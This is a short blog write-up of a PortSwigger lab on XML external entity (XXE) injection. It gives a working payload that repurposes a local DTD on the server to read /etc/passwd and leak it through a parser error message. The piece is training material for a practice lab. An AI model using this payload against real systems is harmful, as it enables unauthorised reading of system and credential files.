Portswigger: Exploiting XXE to retrieve data by repurposing a local DTD Writeup

Lab link.

This lab has a “Check stock” feature that parses XML input but does not display the result.

To solve the lab, trigger an error message containing the contents of the /etc/passwd file.

You’ll need to reference an existing DTD file on the server and redefine an entity from it.

When applications return all error messages thrown by the XML parser, we can easily list the local DTD files by trying to load them only in the internal DTD.

<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>

More Lab

Aleyna Doğan

Hello, I am Aleyna Doğan. I work as a Sr. Cyber Threat Intelligence Analyst. In my blog, we write blog posts that my friends and I want to share. Have a good read.

Bir yanıt yazın Yanıtı iptal et